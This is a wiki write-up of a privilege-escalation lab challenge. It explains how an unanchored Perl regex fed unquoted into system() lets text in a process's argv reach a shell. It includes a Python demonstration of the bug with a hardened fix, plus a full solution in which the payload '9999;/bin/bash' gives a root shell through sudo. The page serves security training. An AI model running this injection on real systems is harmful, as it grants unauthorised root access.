
Challenge 18: License to Kill

Bob Micheletto edited this page Feb 20, 2023 · 1 revision

Level: Hard

Sudo Rule: localuser18 ALL=(ALL) NOPASSWD: /usr/local/bin/admin_task.sh, /usr/local/bin/kill_admin.pl

Notes: The kill_admin.pl script uses an overly broad, and frankly unnecessary, Perl regular expression to locate a process ID in the output of the ps command here:

/(\d.*)\s+pts\/\d+\s+.+\s+\d+:\d+\s+\/bin\/sh\s+\/usr\/local\/bin\/admin_task.sh/

The (\d.*)\s+ group is not anchored to the start of a line with ^, so it captures everything from the first digit onward rather than just a PID, including our arbitrary commands, and that capture is then handed unquoted to the shell here:

system("/bin/kill $1");

We can supply the necessary input by running a shell script that sleeps, passing the crafted text as its argv so that it shows up in the ps output. You could even do it with the kill_admin.pl script itself, since the sudo rule allows any argv and the script doesn't use it.
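To show why the missing anchor is the real bug, here is an added Python check (not part of the original write-up or of the challenge's Perl script) that runs the quoted regex and an anchored, digits-only replacement over two constructed ps lines. The PID TTY STAT TIME COMMAND column layout is an assumption, since the page does not show the script's ps invocation.

```python
import re

# Regex quoted from the write-up above: unanchored, and (\d.*) swallows
# everything between the first digit and the last "pts/N" on the line.
VULNERABLE = re.compile(
    r"(\d.*)\s+pts/\d+\s+.+\s+\d+:\d+\s+/bin/sh\s+/usr/local/bin/admin_task.sh"
)

# Hardened form: anchored at both ends, the PID is \d+ only, the STAT
# column is \S+ rather than .+, and nothing may follow the script path.
HARDENED = re.compile(
    r"^\s*(\d+)\s+pts/\d+\s+\S+\s+\d+:\d+\s+/bin/sh\s+/usr/local/bin/admin_task\.sh$"
)

# Constructed `ps ax`-style lines (assumption: PID TTY STAT TIME COMMAND
# columns; the real ps invocation is not shown on the page).
LEGIT = " 4242 pts/0    S      0:00 /bin/sh /usr/local/bin/admin_task.sh"
CRAFTED = (" 5150 pts/1    S      0:00 /bin/bash ./script.sh "
           "9999;/bin/bash pts/1 S 1:1 /bin/sh /usr/local/bin/admin_task.sh")


def capture(pattern, line):
    """Return $1 as the script would see it, or None when nothing matched."""
    m = pattern.search(line)
    return m.group(1) if m else None


def kill_argv(line):
    """Mitigated lookup: anchored match, digits-only PID, and an argv list
    for an exec-style call (no shell), so metacharacters can never run."""
    pid = capture(HARDENED, line)
    if pid is None or not pid.isdigit():
        return None
    return ["/bin/kill", pid]


if __name__ == "__main__":
    for name, line in (("legit", LEGIT), ("crafted", CRAFTED)):
        print(f"{name:8} vulnerable $1 = {capture(VULNERABLE, line)!r}")
        print(f"{name:8} hardened argv = {kill_argv(line)}")
```

On the crafted line the original pattern's $1 runs from the process's own PID through the `;/bin/bash` text, while the hardened pattern rejects the line outright and only ever yields a bare PID for the real admin_task.sh process.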

Solution:

sudo -l
cat /usr/local/bin/admin_task.sh
cat /usr/local/bin/kill_admin.pl

echo '9999;/bin/bash pts/1 S 1:1 /bin/sh /usr/local/bin/admin_task.sh'

cat > script.sh <<EOF
#!/bin/bash
sleep 60
EOF

chmod +x script.sh

./script.sh '9999;/bin/bash pts/1 S 1:1 /bin/sh /usr/local/bin/admin_task.sh' &
sudo /usr/local/bin/kill_admin.pl
id
